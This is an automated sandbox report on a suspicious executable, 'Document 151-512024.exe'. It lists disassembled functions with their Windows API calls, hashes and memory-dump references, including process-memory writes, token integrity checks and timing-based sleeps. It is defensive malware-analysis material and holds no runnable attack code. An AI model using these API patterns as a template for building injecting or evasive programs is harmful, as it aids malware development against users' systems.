CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0099FF41,80070057,?), ref: 009A0064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0099FF41,80070057,?,?), ref: 009A0070

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: c8a73f7df4471e164e081653fb6faf7fe24bbed1cf000101a96c25a707c29a55
Instruction ID: a0b603858df6d5ba424cf407e18d5f791b261d67c7049c70c965af286f6fa8a6
Opcode Fuzzy Hash: c8a73f7df4471e164e081653fb6faf7fe24bbed1cf000101a96c25a707c29a55
Instruction Fuzzy Hash: DF01DBB2615229BFDB104F68DC04FAA7BAEEB88392F104125F905D2210E770CD80EBA0

Function 009AE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 009AE997
QueryPerformanceFrequency.KERNEL32(?), ref: 009AE9A5
Sleep.KERNEL32(00000000), ref: 009AE9AD
QueryPerformanceCounter.KERNEL32(?), ref: 009AE9B7
Sleep.KERNEL32 ref: 009AE9F3

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: d7a322952dd66db8a72198541f874418b425586958d03d9458053a8e5af6a805
Instruction ID: 2426c5a419cdfa0904f475e96f5677d6283a0b44e72968f2d42ffdc9fff6620b
Opcode Fuzzy Hash: d7a322952dd66db8a72198541f874418b425586958d03d9458053a8e5af6a805
Instruction Fuzzy Hash: 4A016971C0AA2EDBCF00AFE5DC49AEEBB78FF4A300F000546E502B2240CB349590DBA1

Function 009A10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009A1114
GetLastError.KERNEL32(?,00000000,00000000,?,?,009A0B9B,?,?,?), ref: 009A1120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009A0B9B,?,?,?), ref: 009A112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009A0B9B,?,?,?), ref: 009A1136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009A114D

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 39f1d2ec7086de31943d75c80c315caa0aa8ccc253646fdffb06c74d9b7692be
Instruction ID: 67924f2d1e21aeaa8f1697a65d616223892ea7f805fbf3e248e106c0dd3c0a76
Opcode Fuzzy Hash: 39f1d2ec7086de31943d75c80c315caa0aa8ccc253646fdffb06c74d9b7692be
Instruction Fuzzy Hash: 02016DB9145216BFDB114FA4DC49A6A3B6EEF86364B100415FA41C3350DB31DC40EA60

Function 009A0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009A0FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009A0FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009A0FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009A0FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009A1002

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 4e4fa639891ece8e3d8465f649afb00858cbbe15e8489438e1559b6e028d359b
Instruction ID: 22cbaca124a3155afce5df70361b788ed0a96dfc2006bd117b9da3271441fffd
Opcode Fuzzy Hash: 4e4fa639891ece8e3d8465f649afb00858cbbe15e8489438e1559b6e028d359b
Instruction Fuzzy Hash: 59F0C279185312EBDB210FA4DC4DF563B6DEF8A761F100415F905C72A0CA30DC80DA60

Function 009A1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009A102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009A1036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009A1045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009A104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009A1062

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 2aa91d647fdf54d78ea7431b32d5f0df424cae771e3186c398e0f57b9686be8e
Instruction ID: 3a98ff713fae01b7456452bee5b265cae368587ba4c6d6c9fd79cbf7d6445e7b
Opcode Fuzzy Hash: 2aa91d647fdf54d78ea7431b32d5f0df424cae771e3186c398e0f57b9686be8e
Instruction Fuzzy Hash: F5F06279195312EBDB215FA4EC49F563B6DEF8A761F110415F945C7290CA70D880DA60

Function 009B030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,009B017D,?,009B32FC,?,00000001,00982592,?), ref: 009B0324
CloseHandle.KERNEL32(?,?,?,?,009B017D,?,009B32FC,?,00000001,00982592,?), ref: 009B0331
CloseHandle.KERNEL32(?,?,?,?,009B017D,?,009B32FC,?,00000001,00982592,?), ref: 009B033E
CloseHandle.KERNEL32(?,?,?,?,009B017D,?,009B32FC,?,00000001,00982592,?), ref: 009B034B
CloseHandle.KERNEL32(?,?,?,?,009B017D,?,009B32FC,?,00000001,00982592,?), ref: 009B0358
CloseHandle.KERNEL32(?,?,?,?,009B017D,?,009B32FC,?,00000001,00982592,?), ref: 009B0365

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c2478b6efb8f61e18d0933d86185e6e884db5f3a1d7dabbae473c39cdc510984
Instruction ID: a3ebb98c807ad901bd45e294b043facebbf51a80316fbe712a73bc81a31738ef
Opcode Fuzzy Hash: c2478b6efb8f61e18d0933d86185e6e884db5f3a1d7dabbae473c39cdc510984
Instruction Fuzzy Hash: 3201EE72800B058FCB30AF66D980843FBF9BFA03253048A3FD19652930C3B0A988CF80

Function 0097D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0097D752

Part of subcall function 009729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000), ref: 009729DE
Part of subcall function 009729C8: GetLastError.KERNEL32(00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000,00000000), ref: 009729F0

_free.LIBCMT ref: 0097D764
_free.LIBCMT ref: 0097D776
_free.LIBCMT ref: 0097D788
_free.LIBCMT ref: 0097D79A

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2b7906bcfa12e545ed2f84cb993397a70e34647feee2edac824bec9b6620b322
Instruction ID: 4a7f2ca0e680683be2d85b2373c35696b82195cd7a4db5d21fc2430046ebb6d5
Opcode Fuzzy Hash: 2b7906bcfa12e545ed2f84cb993397a70e34647feee2edac824bec9b6620b322
Instruction Fuzzy Hash: F7F01273555208ABC625EBB8FAC6D16B7EDBF84720F988905F14DE7542C730FC828664

Function 009A5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 009A5C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 009A5C6F
MessageBeep.USER32(00000000), ref: 009A5C87
KillTimer.USER32(?,0000040A), ref: 009A5CA3
EndDialog.USER32(?,00000001), ref: 009A5CBD

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 6e07f2be538f4bb46b6f2d4b52879d744ed6d47c81ffaecd55f56807a47275e5
Instruction ID: bfcbf6c49b026ea0f9e860e504d78eb9cf31ba63d7d1b5790ef3f682dff7b575
Opcode Fuzzy Hash: 6e07f2be538f4bb46b6f2d4b52879d744ed6d47c81ffaecd55f56807a47275e5
Instruction Fuzzy Hash: C301D1B0644B05ABEB205B10ED4EFA677B8FB01B05F01065AA683A10E0DBF4A984DA90

Function 009722A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 009722BE

Part of subcall function 009729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000), ref: 009729DE
Part of subcall function 009729C8: GetLastError.KERNEL32(00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000,00000000), ref: 009729F0

_free.LIBCMT ref: 009722D0
_free.LIBCMT ref: 009722E3
_free.LIBCMT ref: 009722F4
_free.LIBCMT ref: 00972305

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f9f053deb6e479cba71efc9e353363eeff9932c9347d29a84226078ca3d23885
Instruction ID: 59c287e5dcfea3716650e16d0f41ae68117d7cde2a43e019056fa895786886a2
Opcode Fuzzy Hash: f9f053deb6e479cba71efc9e353363eeff9932c9347d29a84226078ca3d23885
Instruction Fuzzy Hash: F3F030724111108BC712EFE8BD02DC87B68B718760B05C656F518D62B1C77504939FE4

Function 009595C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 009595D4
StrokeAndFillPath.GDI32(?,?,009971F7,00000000,?,?,?), ref: 009595F0
SelectObject.GDI32(?,00000000), ref: 00959603
DeleteObject.GDI32 ref: 00959616
StrokePath.GDI32(?), ref: 00959631

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: e6ca9b9147ac50dda27ca251a15f6ee669aaa8cdb32b442b90da95550482f179
Instruction ID: f0bce8d1db72e22cc12a5ef518c90a4d1aad22b12ccfa36043f328c5f4985dba
Opcode Fuzzy Hash: e6ca9b9147ac50dda27ca251a15f6ee669aaa8cdb32b442b90da95550482f179
Instruction Fuzzy Hash: B2F03C7004A305EBEB12DFA6ED1C7A43B65AB01323F44C215FA75550F0C73089AAEF20

Function 00970F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 009710F9
__freea.LIBCMT ref: 00971117

Part of subcall function 00971537: _free.LIBCMT ref: 0097154F

Strings

a/p, xrefs: 009711DE
am/pm, xrefs: 0097117A

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 8f21f1c4079d6700b6c1305e6e27b26ffec1075eab3dab1b01b992aa9ae32c85
Instruction ID: 19a79d140b039c77ba68821db9577e7e5d1042b98b0d7dcfd5833a80d776351b
Opcode Fuzzy Hash: 8f21f1c4079d6700b6c1305e6e27b26ffec1075eab3dab1b01b992aa9ae32c85
Instruction Fuzzy Hash: 1CD1F233904206CBDB289F6CC895BFAB7B8FF45700F28C559E919AB651D3399D80CB91

Function 009C7B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00960242: EnterCriticalSection.KERNEL32(00A1070C,00A11884,?,?,0095198B,00A12518,?,?,?,009412F9,00000000), ref: 0096024D
Part of subcall function 00960242: LeaveCriticalSection.KERNEL32(00A1070C,?,0095198B,00A12518,?,?,?,009412F9,00000000), ref: 0096028A

Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD

Part of subcall function 009600A3: __onexit.LIBCMT ref: 009600A9

__Init_thread_footer.LIBCMT ref: 009C7BFB

Part of subcall function 009601F8: EnterCriticalSection.KERNEL32(00A1070C,?,?,00958747,00A12514), ref: 00960202
Part of subcall function 009601F8: LeaveCriticalSection.KERNEL32(00A1070C,?,00958747,00A12514), ref: 00960235

Strings

G, xrefs: 009C7C7F
Variable must be of type 'Object'., xrefs: 009C7C3A
5, xrefs: 009C7C78

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: 90a57fb26cbc6d7523e9b1cd39c970cbdb319a052e52acd66b19b0e31c256d76
Instruction ID: fe0fca585a83dcbeebb65549d6e1b714493e4cefae6ffd4ca924b2a1b3b835d0
Opcode Fuzzy Hash: 90a57fb26cbc6d7523e9b1cd39c970cbdb319a052e52acd66b19b0e31c256d76
Instruction Fuzzy Hash: 53916970A04209AFCB14EF94D991EADB7B5BF88300F10845DF8469B392DB71AE85CF52

Function 009A2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009AB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009A21D0,?,?,00000034,00000800,?,00000034), ref: 009AB42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 009A2760

Part of subcall function 009AB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009A21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 009AB3F8

Part of subcall function 009AB32A: GetWindowThreadProcessId.USER32(?,?), ref: 009AB355
Part of subcall function 009AB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,009A2194,00000034,?,?,00001004,00000000,00000000), ref: 009AB365
Part of subcall function 009AB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,009A2194,00000034,?,?,00001004,00000000,00000000), ref: 009AB37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009A27CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009A281A

Strings

@, xrefs: 009A2832

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 36397b58ac5778d97d3305c136684f3450cb998d25e2f4beb25ebdb9ffa98ab4
Instruction ID: d0c01cd4739d06e57030b0f4b5af3e9eda8aa937d8e4459784b62fcb1c4b57bc
Opcode Fuzzy Hash: 36397b58ac5778d97d3305c136684f3450cb998d25e2f4beb25ebdb9ffa98ab4
Instruction Fuzzy Hash: 88413C72901218AFDB10DFA8CD41BEEBBB8EF4A300F104095FA55B7191DB706E85CBA0

Function 0097172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Document 151-512024.exe,00000104), ref: 00971769
_free.LIBCMT ref: 00971834
_free.LIBCMT ref: 0097183E

Strings

C:\Users\user\Desktop\Document 151-512024.exe, xrefs: 00971760, 00971767, 00971796, 009717CE

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\Document 151-512024.exe
API String ID: 2506810119-3057287820
Opcode ID: 587ff40f68ec599e0b67ed2debfceb7cc3eb75b8fa589953f1f5f1f889ae0a5f
Instruction ID: cfb714b44ed1099ae25ac5bbe4f6412a89f6f3e498dba5e6035a8f490b4cfe0d
Opcode Fuzzy Hash: 587ff40f68ec599e0b67ed2debfceb7cc3eb75b8fa589953f1f5f1f889ae0a5f
Instruction Fuzzy Hash: EE316E72A04218AFDB25DF99D885EDEBBFCEB85310F148166F908D7211D6B08E41CB91

Function 009D4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,009DCC08,00000000,?,?,?,?), ref: 009D44AA
GetWindowLongW.USER32 ref: 009D44C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 009D44D7

Strings

SysTreeView32, xrefs: 009D447C

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 9194b299f0d0c7b0bd0c07bf91bedb2c06b88d0f9414ad28f20c7b2498602d3c
Instruction ID: 100f25a8c753dd923009298fbc3d33cb6c9f24a372d7f7cb15ea4f9d09819a4c
Opcode Fuzzy Hash: 9194b299f0d0c7b0bd0c07bf91bedb2c06b88d0f9414ad28f20c7b2498602d3c
Instruction Fuzzy Hash: A5319E71294606AFDF208F78DC45BEA77A9EB49334F208716F975922E0D770EC909B50

Function 009D4537 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 009D461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009D4634

Strings

', xrefs: 009D458E
0n, xrefs: 009D45D7

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSend
String ID: '$0n
API String ID: 3850602802-94391585
Opcode ID: 43ae264e741ae8c251f4ce68a2fcb69d20bddee3d35c07ce38ac87541b54d14e
Instruction ID: 9690ceb82906a88f5f5b27d988d85f207cb72a665f538812f73b89dc9a45556d
Opcode Fuzzy Hash: 43ae264e741ae8c251f4ce68a2fcb69d20bddee3d35c07ce38ac87541b54d14e
Instruction Fuzzy Hash: BF310474A4120A9FDB14CFA9D991BDABBB9FB49300F14806AE905AB391D770E941CF90

Function 00943923 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009833A2

Part of subcall function 00946B57: _wcslen.LIBCMT ref: 00946B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00943A04

